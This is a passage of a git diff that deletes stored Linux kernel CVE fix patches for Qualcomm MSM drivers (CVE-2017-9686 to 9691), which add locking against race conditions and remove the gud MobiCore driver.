--	_rndis_qc = rndis;
--
- 	if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA) {
- 		status = rndis_ipa_init(&rndis_ipa_params);
- 		if (status) {
-@@ -1221,86 +1224,128 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN],
- 		goto fail;
- 	}
- 
--	if (rndis->xport != USB_GADGET_XPORT_BAM2BAM_IPA)
--		return status;
-+	_rndis_qc = rndis;
-+	
-+	return status;
- 
- fail:
--  kfree(rndis);
--  _rndis_qc = NULL;
-+	kfree(rndis);
-+	_rndis_qc = NULL;
- 	rndis_exit();
- 	return status;
- }
- 
- static int rndis_qc_open_dev(struct inode *ip, struct file *fp)
- {
-+	int ret = 0;
-+	unsigned long flags;
- 	pr_info("Open rndis QC driver\n");
- 
-+	spin_lock_irqsave(&rndis_lock, flags);
- 	if (!_rndis_qc) {
- 		pr_err("rndis_qc_dev not created yet\n");
--		return -ENODEV;
-+		ret = -ENODEV;
-+		goto fail;
- 	}
- 
- 	if (rndis_qc_lock(&_rndis_qc->open_excl)) {
- 		pr_err("Already opened\n");
--		return -EBUSY;
-+		ret = -EBUSY;
-+		goto fail;
- 	}
- 
- 	fp->private_data = _rndis_qc;
--	pr_info("rndis QC file opened\n");
-+fail:
-+	spin_unlock_irqrestore(&rndis_lock, flags);
- 
--	return 0;
-+	if (!ret)
-+		pr_info("rndis QC file opened\n");
-+
-+	return ret;
- }
- 
- static int rndis_qc_release_dev(struct inode *ip, struct file *fp)
- {
--	struct f_rndis_qc	*rndis = fp->private_data;
--
-+	unsigned long flags;
- 	pr_info("Close rndis QC file");
--	rndis_qc_unlock(&rndis->open_excl);
- 
-+	spin_lock_irqsave(&rndis_lock, flags);
-+
-+	if (!_rndis_qc) {
-+		pr_err("rndis_qc_dev not present\n");
-+		spin_unlock_irqrestore(&rndis_lock, flags);
-+		return -ENODEV;
-+	}
-+	rndis_qc_unlock(&_rndis_qc->open_excl);
-+	spin_unlock_irqrestore(&rndis_lock, flags);
- 	return 0;
- }
- 
- static long rndis_qc_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- {
--	struct f_rndis_qc	*rndis = fp->private_data;
-+	u8 qc_max_pkt_per_xfer = 0;
-+	u32 qc_max_pkt_size = 0;
- 	int ret = 0;
-+	unsigned long flags;
-+
-+	spin_lock_irqsave(&rndis_lock, flags);
-+	if (!_rndis_qc) {
-+		pr_err("rndis_qc_dev not present\n");
-+		ret = -ENODEV;
-+		goto fail;
-+	}
- 
--	pr_info("Received command %d", cmd);
-+	qc_max_pkt_per_xfer = _rndis_qc->max_pkt_per_xfer;
-+	qc_max_pkt_size = _rndis_qc->max_pkt_size;
- 
--	if (rndis_qc_lock(&rndis->ioctl_excl))
--		return -EBUSY;
-+	if (rndis_qc_lock(&_rndis_qc->ioctl_excl)) {
-+		ret = -EBUSY;
-+		goto fail;
-+	}
-+
-+	spin_unlock_irqrestore(&rndis_lock, flags);
-+
-+	pr_info("Received command %d\n", cmd);
- 
- 	switch (cmd) {
- 	case RNDIS_QC_GET_MAX_PKT_PER_XFER:
- 		ret = copy_to_user((void __user *)arg,
--					&rndis->max_pkt_per_xfer,
--					sizeof(rndis->max_pkt_per_xfer));
-+					&qc_max_pkt_per_xfer,
-+					sizeof(qc_max_pkt_per_xfer));
- 		if (ret) {
- 			pr_err("copying to user space failed");
- 			ret = -EFAULT;
- 		}
- 		pr_info("Sent max packets per xfer %d",
--				rndis->max_pkt_per_xfer);
-+				qc_max_pkt_per_xfer);
- 		break;
- 	case RNDIS_QC_GET_MAX_PKT_SIZE:
- 		ret = copy_to_user((void __user *)arg,
--					&rndis->max_pkt_size,
--					sizeof(rndis->max_pkt_size));
-+					&qc_max_pkt_size,
-+					sizeof(qc_max_pkt_size));
- 		if (ret) {
- 			pr_err("copying to user space failed");
- 			ret = -EFAULT;
- 		}
- 		pr_debug("Sent max packet size %d",
--				rndis->max_pkt_size);
-+				qc_max_pkt_size);
- 		break;
- 	default:
- 		pr_err("Unsupported IOCTL");
- 		ret = -EINVAL;
- 	}
- 
--	rndis_qc_unlock(&rndis->ioctl_excl);
-+	spin_lock_irqsave(&rndis_lock, flags);
-+
-+	if (!_rndis_qc) {
-+		pr_err("rndis_qc_dev not present\n");
-+		ret = -ENODEV;
-+		goto fail;
-+	}
-+	rndis_qc_unlock(&_rndis_qc->ioctl_excl);
- 
-+fail:
-+	spin_unlock_irqrestore(&rndis_lock, flags);
- 	return ret;
- }
- 
-@@ -1323,6 +1368,8 @@ static int rndis_qc_init(void)
- 
- 	pr_info("initialize rndis QC instance\n");
- 
-+	spin_lock_init(&rndis_lock);
-+
- 	ret = misc_register(&rndis_qc_device);
- 	if (ret)
- 		pr_err("rndis QC driver failed to register");
diff --git a/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch
deleted file mode 100644
index 1b784b0b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9686/ANY/0001.patch
+++ /dev/null
@@ -1,193 +0,0 @@
-From de875dd095d3ec0906c77518d28f793e6c69a9da Mon Sep 17 00:00:00 2001
-From: Siva Kumar Akkireddi <sivaa@codeaurora.org>
-Date: Thu, 11 May 2017 15:29:47 +0530
-Subject: msm: sps: Fix race condition in SPS debugfs APIs
-
-SPS debugfs APIs can be called concurrently which can result
-in dangling pointer access. This change synchronizes access
-to the SPS debugfs buffer.
-
-Change-Id: I409b3f0618f760cb67eba47b43c81d166cdae4aa
-Signed-off-by: Siva Kumar Akkireddi <sivaa@codeaurora.org>
----
- drivers/platform/msm/sps/sps.c  | 15 ++++++++++++++-
- drivers/platform/msm/sps/spsi.h | 17 -----------------
- 2 files changed, 14 insertions(+), 18 deletions(-)
-
-diff --git a/drivers/platform/msm/sps/sps.c b/drivers/platform/msm/sps/sps.c
-index b812960..e2abeaf 100644
---- a/drivers/platform/msm/sps/sps.c
-+++ b/drivers/platform/msm/sps/sps.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016	, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -67,6 +67,7 @@ static char *debugfs_buf;
- static u32 debugfs_buf_size;
- static u32 debugfs_buf_used;
- static int wraparound;
-+static struct mutex sps_debugfs_lock;
- 
- struct dentry *dent;
- struct dentry *dfile_info;
-@@ -85,6 +86,7 @@ static struct sps_bam *phy2bam(phys_addr_t phys_addr);
- /* record debug info for debugfs */
- void sps_debugfs_record(const char *msg)
- {
-+	mutex_lock(&sps_debugfs_lock);
- 	if (debugfs_record_enabled) {
- 		if (debugfs_buf_used + MAX_MSG_LEN >= debugfs_buf_size) {
- 			debugfs_buf_used = 0;
-@@ -98,6 +100,7 @@ void sps_debugfs_record(const char *msg)
- 					debugfs_buf_size - debugfs_buf_used,
- 					"\n**** end line of sps log ****\n\n");
- 	}
-+	mutex_unlock(&sps_debugfs_lock);
- }
- 
- /* read the recorded debug info to userspace */
-@@ -107,6 +110,7 @@ static ssize_t sps_read_info(struct file *file, char __user *ubuf,
- 	int ret = 0;
- 	int size;
- 
-+	mutex_lock(&sps_debugfs_lock);
- 	if (debugfs_record_enabled) {
- 		if (wraparound)
- 			size = debugfs_buf_size - MAX_MSG_LEN;
-@@ -116,6 +120,7 @@ static ssize_t sps_read_info(struct file *file, char __user *ubuf,
- 		ret = simple_read_from_buffer(ubuf, count, ppos,
- 				debugfs_buf, size);
- 	}
-+	mutex_unlock(&sps_debugfs_lock);
- 
- 	return ret;
- }
-@@ -161,11 +166,13 @@ static ssize_t sps_set_info(struct file *file, const char __user *buf,
- 
- 	new_buf_size = buf_size_kb * SZ_1K;
- 
-+	mutex_lock(&sps_debugfs_lock);
- 	if (debugfs_record_enabled) {
- 		if (debugfs_buf_size == new_buf_size) {
- 			/* need do nothing */
- 			pr_info("sps:debugfs: input buffer size "
- 				"is the same as before.\n");
-+			mutex_unlock(&sps_debugfs_lock);
- 			return count;
- 		} else {
- 			/* release the current buffer */
-@@ -185,12 +192,14 @@ static ssize_t sps_set_info(struct file *file, const char __user *buf,
- 	if (!debugfs_buf) {
- 		debugfs_buf_size = 0;
- 		pr_err("sps:fail to allocate memory for debug_fs.\n");
-+		mutex_unlock(&sps_debugfs_lock);
- 		return -ENOMEM;
- 	}
- 
- 	debugfs_buf_used = 0;
- 	wraparound = false;
- 	debugfs_record_enabled = true;
-+	mutex_unlock(&sps_debugfs_lock);
- 
- 	return count;
- }
-@@ -239,6 +248,7 @@ static ssize_t sps_set_logging_option(struct file *file, const char __user *buf,
- 		return count;
- 	}
- 
-+	mutex_lock(&sps_debugfs_lock);
- 	if (((option == 0) || (option == 2)) &&
- 		((logging_option == 1) || (logging_option == 3))) {
- 		debugfs_record_enabled = false;
-@@ -250,6 +260,7 @@ static ssize_t sps_set_logging_option(struct file *file, const char __user *buf,
- 	}
- 
- 	logging_option = option;
-+	mutex_unlock(&sps_debugfs_lock);
- 
- 	return count;
- }
-@@ -587,6 +598,8 @@ static void sps_debugfs_init(void)
- 		goto bam_log_level_err;
- 	}
- 
-+	mutex_init(&sps_debugfs_lock);
-+
- 	return;
- 
- bam_log_level_err:
-diff --git a/drivers/platform/msm/sps/spsi.h b/drivers/platform/msm/sps/spsi.h
-index ccf761e..abf4b04 100644
---- a/drivers/platform/msm/sps/spsi.h
-+++ b/drivers/platform/msm/sps/spsi.h
-@@ -145,11 +145,6 @@ extern u8 print_limit_option;
- 				pr_info(msg, ##args);	\
- 		} \
- 	} while (0)
--#define SPS_DEBUGFS(msg, args...) do {					\
--		char buf[MAX_MSG_LEN];		\
--		snprintf(buf, MAX_MSG_LEN, msg"\n", ##args);	\
--		sps_debugfs_record(buf);	\
--	} while (0)
- #define SPS_ERR(dev, msg, args...) do {					\
- 		if (logging_option != 1) {	\
- 			if (unlikely(print_limit_option > 2))	\
-@@ -157,8 +152,6 @@ extern u8 print_limit_option;
- 			else	\
- 				pr_err(msg, ##args);	\
- 		}	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		SPS_IPC(3, dev, msg, args); \
- 	} while (0)
- #define SPS_INFO(dev, msg, args...) do {				\
-@@ -168,8 +161,6 @@ extern u8 print_limit_option;
- 			else	\
- 				pr_info(msg, ##args);	\
- 		}	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		SPS_IPC(3, dev, msg, args); \
- 	} while (0)
- #define SPS_DBG(dev, msg, args...) do {					\
-@@ -181,8 +172,6 @@ extern u8 print_limit_option;
- 				pr_info(msg, ##args);	\
- 		} else	\
- 			pr_debug(msg, ##args);	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		if (dev) { \
- 			if ((dev)->ipc_loglevel <= 0)	\
- 				SPS_IPC(0, dev, msg, args); \
-@@ -197,8 +186,6 @@ extern u8 print_limit_option;
- 				pr_info(msg, ##args);	\
- 		} else	\
- 			pr_debug(msg, ##args);	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		if (dev) { \
- 			if ((dev)->ipc_loglevel <= 1)	\
- 				SPS_IPC(1, dev, msg, args);	\
-@@ -213,8 +200,6 @@ extern u8 print_limit_option;
- 				pr_info(msg, ##args);	\
- 		} else	\
- 			pr_debug(msg, ##args);	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		if (dev) { \
- 			if ((dev)->ipc_loglevel <= 2)	\
- 				SPS_IPC(2, dev, msg, args); \
-@@ -229,8 +214,6 @@ extern u8 print_limit_option;
- 				pr_info(msg, ##args);	\
- 		} else	\
- 			pr_debug(msg, ##args);	\
--		if (unlikely(debugfs_record_enabled))	\
--			SPS_DEBUGFS(msg, ##args);	\
- 		if (dev) { \
- 			if ((dev)->ipc_loglevel <= 3)	\
- 				SPS_IPC(3, dev, msg, args); \
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch
deleted file mode 100644
index 8ad40b53..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9687/3.18/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 34cff2eb2adc663de32ca682b57551c50c9253c6 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Fri, 21 Apr 2017 10:42:57 -0700
-Subject: [PATCH] msm: ipa: fix IPC low priority logging
-
-Allocate IPC low priority on first usage only.
-
-Bug: 62827190
-Change-Id: Icea7f0fad9ed34c93641296f68736bbaf2e6eaa9
-CRs-Fixed: 2016076
-Acked-by: Ady Abraham <adya@qti,qualcomm.com>
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c b/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-index 12127a2304bbc..66482e2dc0634 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_debugfs.c
-@@ -105,6 +105,7 @@ static char dbg_buff[IPA_MAX_MSG_LEN];
- static char *active_clients_buf;
- 
- static s8 ep_reg_idx;
-+static void *ipa_ipc_low_buff;
- 
- 
- static ssize_t ipa3_read_gen_reg(struct file *file, char __user *ubuf,
-@@ -1610,22 +1611,20 @@ static ssize_t ipa3_enable_ipc_low(struct file *file,
- 	if (kstrtos8(dbg_buff, 0, &option))
- 		return -EFAULT;
- 
-+	mutex_lock(&ipa3_ctx->lock);
- 	if (option) {
--		if (!ipa3_ctx->logbuf_low) {
--			ipa3_ctx->logbuf_low =
-+		if (!ipa_ipc_low_buff) {
-+			ipa_ipc_low_buff =
- 				ipc_log_context_create(IPA_IPC_LOG_PAGES,
- 					"ipa_low", 0);
- 		}
--
--		if (ipa3_ctx->logbuf_low == NULL) {
--			IPAERR("failed to get logbuf_low\n");
--			return -EFAULT;
--		}
-+			if (ipa_ipc_low_buff == NULL)
-+				IPAERR("failed to get logbuf_low\n");
-+		ipa3_ctx->logbuf_low = ipa_ipc_low_buff;
- 	} else {
--		if (ipa3_ctx->logbuf_low)
--			ipc_log_context_destroy(ipa3_ctx->logbuf_low);
- 		ipa3_ctx->logbuf_low = NULL;
- 	}
-+	mutex_unlock(&ipa3_ctx->lock);
- 
- 	return count;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch
deleted file mode 100644
index 71235954..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9687/4.4/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 8f1a77f5da53edd2b5a1c42ddd766712a90109d6 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Thu, 20 Apr 2017 10:25:43 -0700
-Subject: msm: gsi: fix IPC low priority logging
-
-Allocate IPC low priority on first usage only.
-
-Change-Id: Ic44f5af02d1d7fd72b255c8989cfc6b7dcd7766d
-CRs-Fixed: 2016076
-Acked-by: Ady Abraham <adya@qti,qualcomm.com>
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/gsi/gsi_dbg.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/platform/msm/gsi/gsi_dbg.c b/drivers/platform/msm/gsi/gsi_dbg.c
-index 717c8917..eaf50ca 100644
---- a/drivers/platform/msm/gsi/gsi_dbg.c
-+++ b/drivers/platform/msm/gsi/gsi_dbg.c
-@@ -29,6 +29,7 @@
- 
- static struct dentry *dent;
- static char dbg_buff[4096];
-+static void *gsi_ipc_logbuf_low;
- 
- static void gsi_wq_print_dp_stats(struct work_struct *work);
- static DECLARE_DELAYED_WORK(gsi_print_dp_stats_work, gsi_wq_print_dp_stats);
-@@ -764,22 +765,20 @@ static ssize_t gsi_enable_ipc_low(struct file *file,
- 	if (kstrtos8(dbg_buff, 0, &option))
- 		return -EFAULT;
- 
-+	mutex_lock(&gsi_ctx->mlock);
- 	if (option) {
--		if (!gsi_ctx->ipc_logbuf_low) {
--			gsi_ctx->ipc_logbuf_low =
-+		if (!gsi_ipc_logbuf_low) {
-+			gsi_ipc_logbuf_low =
- 				ipc_log_context_create(GSI_IPC_LOG_PAGES,
- 					"gsi_low", 0);
-+			if (gsi_ipc_logbuf_low == NULL)
-+				TERR("failed to get ipc_logbuf_low\n");
- 		}
--
--		if (gsi_ctx->ipc_logbuf_low == NULL) {
--			TERR("failed to get ipc_logbuf_low\n");
--			return -EFAULT;
--		}
-+		gsi_ctx->ipc_logbuf_low = gsi_ipc_logbuf_low;
- 	} else {
--		if (gsi_ctx->ipc_logbuf_low)
--			ipc_log_context_destroy(gsi_ctx->ipc_logbuf_low);
- 		gsi_ctx->ipc_logbuf_low = NULL;
- 	}
-+	mutex_unlock(&gsi_ctx->mlock);
- 
- 	return count;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch
deleted file mode 100644
index 15d4323f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9690/3.18/0001.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From b59b67fbd2f1d4f71e7a4f9e6723f04b717efc74 Mon Sep 17 00:00:00 2001
-From: Siarhei Vishniakou <svv@google.com>
-Date: Thu, 16 Mar 2017 16:26:53 -0700
-Subject: [PATCH] arm64: dts: marlin: remove QBT1000 from device tree
-
-Marlin does not use QBT1000.
-
-Bug: 36575870
-Bug: 36227548
-Test: Tested on marlin and sailfish.
-
-Change-Id: I48a2b75f1cd678a673a8706e8d3304b25f45d3cd
-Signed-off-by: Siarhei Vishniakou <svv@google.com>
----
- arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi b/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-index 831a99c32c0aa..4fedb4b6149c4 100644
---- a/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-+++ b/arch/arm64/boot/dts/htc/msm8996-htc-common.dtsi
-@@ -109,6 +109,7 @@
- 			qcom,mitigation-freq-khz = <1132800>;
- 		};
- 	};
-+	/delete-node/ qcom,qbt1000;
- };
- 
- &wdog {
diff --git a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch
deleted file mode 100644
index 90eb2966..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 869bd2cd3d6c17826b6f162e0d721174224b867a Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Wed, 31 May 2017 15:11:05 -0700
-Subject: [PATCH] defconfig: gud: Remove gud driver
-
-Disable and remove gud mobicore driver.
-
-Bug: 33842910
-CRs-Fixed: 1116560
-Change-Id: Ia16bc3e1331f86724a391fd367587b56ccc14546
-Acked-by: Tony Hamilton <tonyh@qti.qualcomm.com>
-Signed-off-by: Trudy Shearer <tshearer@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- arch/arm64/configs/msm-auto_defconfig | 1 -
- arch/arm64/configs/msm_defconfig      | 1 -
- 2 files changed, 2 deletions(-)
-
-diff --git a/arch/arm64/configs/msm-auto_defconfig b/arch/arm64/configs/msm-auto_defconfig
-index 9a1856e70ceeb..2839526226bac 100644
---- a/arch/arm64/configs/msm-auto_defconfig
-+++ b/arch/arm64/configs/msm-auto_defconfig
-@@ -596,7 +596,6 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS_SSC=y
- CONFIG_MSM_TZ_LOG=y
--CONFIG_MOBICORE_DRIVER=m
- CONFIG_EXT2_FS=y
- CONFIG_EXT2_FS_XATTR=y
- CONFIG_EXT3_FS=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index ba053b5abfdfc..1fbbbbe876ad4 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -594,7 +594,6 @@ CONFIG_CORESIGHT_REMOTE_ETM=y
- CONFIG_CORESIGHT_QPDI=y
- CONFIG_SENSORS_SSC=y
- CONFIG_MSM_TZ_LOG=y
--CONFIG_MOBICORE_DRIVER=m
- CONFIG_EXT2_FS=y
- CONFIG_EXT2_FS_XATTR=y
- CONFIG_EXT3_FS=y
diff --git a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch
deleted file mode 100644
index 345a38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9691/ANY/0002.patch
+++ /dev/null
@@ -1,9751 +0,0 @@
-From 04468bc1d72f15e6b8f19014e8c6203038dd6b23 Mon Sep 17 00:00:00 2001
-From: Maggie White <maggiewhite@google.com>
-Date: Fri, 2 Jun 2017 18:10:06 -0700
-Subject: [PATCH] msm: gud: Remove gud driver
-
-Complete removal of gud mobicore driver.
-The driver author delivers an updated version of the driver to
-interested parties directly rendering this version obsolete.
-
-Bug: 33842910
-CRs-Fixed: 1116560
-Change-Id: I40498d3203b1d6ca04f2b5a2e65461851d84d2d4
-Acked-by: Tony Hamilton <tonyh@qti.qualcomm.com>
-Signed-off-by: Trudy Shearer <tshearer@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
-Signed-off-by: Maggie White <maggiewhite@google.com>
----
- drivers/Kconfig                                    |    2 -
- drivers/Makefile                                   |    3 -
- drivers/gud/Kconfig                                |   35 -
- drivers/gud/Makefile                               |    6 -
- drivers/gud/MobiCoreDriver/Makefile                |   33 -
- drivers/gud/MobiCoreDriver/admin.c                 | 1011 -------------------
- drivers/gud/MobiCoreDriver/admin.h                 |   32 -
- drivers/gud/MobiCoreDriver/api.c                   |  419 --------
- drivers/gud/MobiCoreDriver/api.h                   |   46 -
- drivers/gud/MobiCoreDriver/arm.h                   |   88 --
- drivers/gud/MobiCoreDriver/build_tag.h             |   15 -
- drivers/gud/MobiCoreDriver/client.c                |  572 -----------
- drivers/gud/MobiCoreDriver/client.h                |   99 --
- drivers/gud/MobiCoreDriver/clientlib.c             |  433 --------
- drivers/gud/MobiCoreDriver/clock.c                 |  161 ---
- drivers/gud/MobiCoreDriver/clock.h                 |   53 -
- drivers/gud/MobiCoreDriver/debug.h                 |   63 --
- drivers/gud/MobiCoreDriver/fastcall.c              |  512 ----------
- drivers/gud/MobiCoreDriver/fastcall.h              |   38 -
- drivers/gud/MobiCoreDriver/logging.c               |  251 -----
- drivers/gud/MobiCoreDriver/logging.h               |   51 -
- drivers/gud/MobiCoreDriver/main.c                  |  750 --------------
- drivers/gud/MobiCoreDriver/main.h                  |   60 --
- drivers/gud/MobiCoreDriver/mci/mcifc.h             |  144 ---
- drivers/gud/MobiCoreDriver/mci/mcimcp.h            |  508 ----------
- drivers/gud/MobiCoreDriver/mci/mcinq.h             |   86 --
- drivers/gud/MobiCoreDriver/mci/mcloadformat.h      |  134 ---
- drivers/gud/MobiCoreDriver/mcp.c                   | 1067 --------------------
- drivers/gud/MobiCoreDriver/mcp.h                   |  121 ---
- drivers/gud/MobiCoreDriver/mmu.c                   |  450 ---------
- drivers/gud/MobiCoreDriver/mmu.h                   |   44 -
- drivers/gud/MobiCoreDriver/platform.h              |  150 ---
- drivers/gud/MobiCoreDriver/pm.c                    |   62 --
- drivers/gud/MobiCoreDriver/pm.h                    |   36 -
- drivers/gud/MobiCoreDriver/public/mc_admin.h       |   80 --
- drivers/gud/MobiCoreDriver/public/mc_linux.h       |  170 ----
- drivers/gud/MobiCoreDriver/public/mc_linux_api.h   |   28 -
- .../MobiCoreDriver/public/mobicore_driver_api.h    |  450 ---------
- drivers/gud/MobiCoreDriver/scheduler.c             |  231 -----
- drivers/gud/MobiCoreDriver/scheduler.h             |   25 -
- drivers/gud/MobiCoreDriver/session.c               |  779 --------------
- drivers/gud/MobiCoreDriver/session.h               |   63 --
- drivers/gud/setupDrivers.sh                        |   19 -
- 43 files changed, 9380 deletions(-)
- delete mode 100644 drivers/gud/Kconfig
- delete mode 100644 drivers/gud/Makefile
- delete mode 100644 drivers/gud/MobiCoreDriver/Makefile
- delete mode 100644 drivers/gud/MobiCoreDriver/admin.c
- delete mode 100644 drivers/gud/MobiCoreDriver/admin.h
- delete mode 100644 drivers/gud/MobiCoreDriver/api.c
- delete mode 100644 drivers/gud/MobiCoreDriver/api.h
- delete mode 100644 drivers/gud/MobiCoreDriver/arm.h
- delete mode 100644 drivers/gud/MobiCoreDriver/build_tag.h
- delete mode 100644 drivers/gud/MobiCoreDriver/client.c
- delete mode 100644 drivers/gud/MobiCoreDriver/client.h
- delete mode 100644 drivers/gud/MobiCoreDriver/clientlib.c
- delete mode 100644 drivers/gud/MobiCoreDriver/clock.c
- delete mode 100644 drivers/gud/MobiCoreDriver/clock.h
- delete mode 100644 drivers/gud/MobiCoreDriver/debug.h
- delete mode 100644 drivers/gud/MobiCoreDriver/fastcall.c
- delete mode 100644 drivers/gud/MobiCoreDriver/fastcall.h
- delete mode 100644 drivers/gud/MobiCoreDriver/logging.c
- delete mode 100644 drivers/gud/MobiCoreDriver/logging.h
- delete mode 100644 drivers/gud/MobiCoreDriver/main.c
- delete mode 100644 drivers/gud/MobiCoreDriver/main.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcifc.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcimcp.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcinq.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mci/mcloadformat.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mcp.c
- delete mode 100644 drivers/gud/MobiCoreDriver/mcp.h
- delete mode 100644 drivers/gud/MobiCoreDriver/mmu.c
- delete mode 100644 drivers/gud/MobiCoreDriver/mmu.h
- delete mode 100644 drivers/gud/MobiCoreDriver/platform.h
- delete mode 100644 drivers/gud/MobiCoreDriver/pm.c
- delete mode 100644 drivers/gud/MobiCoreDriver/pm.h
- delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_admin.h
- delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_linux.h
- delete mode 100644 drivers/gud/MobiCoreDriver/public/mc_linux_api.h
- delete mode 100644 drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h
- delete mode 100644 drivers/gud/MobiCoreDriver/scheduler.c
- delete mode 100644 drivers/gud/MobiCoreDriver/scheduler.h
- delete mode 100644 drivers/gud/MobiCoreDriver/session.c
- delete mode 100644 drivers/gud/MobiCoreDriver/session.h
- delete mode 100644 drivers/gud/setupDrivers.sh
-
-diff --git a/drivers/Kconfig b/drivers/Kconfig
-index 0e7c68c62542a..8b796ec00009e 100644
---- a/drivers/Kconfig
-+++ b/drivers/Kconfig
-@@ -200,8 +200,6 @@ source "drivers/firmware/Kconfig"
- 
- source "drivers/bif/Kconfig"
- 
--source "drivers/gud/Kconfig"
--
- source "drivers/htc_mnemosyne/Kconfig"
- 
- endmenu
-diff --git a/drivers/Makefile b/drivers/Makefile
-index fb0cd18143ad5..13236262a1857 100644
---- a/drivers/Makefile
-+++ b/drivers/Makefile
-@@ -171,9 +171,6 @@ obj-$(CONFIG_BIF)		+= bif/
- 
- obj-$(CONFIG_SENSORS_SSC)	+= sensors/
- 
--# <t-base drivers
--obj-$(CONFIG_MOBICORE_DRIVER)	+= gud/
--
- # HTC debug
- obj-$(CONFIG_HTC_DEBUG)			+= htc_debug/
- obj-$(CONFIG_HTC_DEBUG_FOOTPRINT)	+= htc_mnemosyne/
-diff --git a/drivers/gud/Kconfig b/drivers/gud/Kconfig
-deleted file mode 100644
-index 0e030bf60878d..0000000000000
---- a/drivers/gud/Kconfig
-+++ /dev/null
-@@ -1,35 +0,0 @@
--#
--# MobiCore configuration
--#
--config MOBICORE_DRIVER
--    tristate "MobiCore Driver"    
--    ---help---
--      Enable Linux Kernel MobiCore Support
--
--config MOBICORE_DEBUG
--    bool "MobiCore Module debug mode"
--    depends on MOBICORE_DRIVER
--    ---help---
--      Enable Debug mode in the MobiCore Driver.
--      It enables printing information about mobicore operations
--
--config MOBICORE_VERBOSE
--    bool "MobiCore Module verbose debug mode"
--    depends on MOBICORE_DEBUG
--    ---help---
--      Enable Verbose Debug mode in the MobiCore Driver.
--      It enables printing extra information about mobicore operations
--      Beware: this is only useful for debuging deep in the driver because
--      it prints too much logs
--
--config TRUSTONIC_TRUSTED_UI
--    tristate "<t-base TUI"
--    depends on MOBICORE_DRIVER
--    ---help---
--      Enable <t-base Trusted User Interface
--
--config TRUSTONIC_TRUSTED_UI_FB_BLANK
--    bool "<t-base TUI with fb_blank"
--    depends on TRUSTONIC_TRUSTED_UI
--    ---help---
--    Blank the framebuffer before starting a TUI session
-diff --git a/drivers/gud/Makefile b/drivers/gud/Makefile
-deleted file mode 100644
-index e782876ce2b5b..0000000000000
---- a/drivers/gud/Makefile
-+++ /dev/null
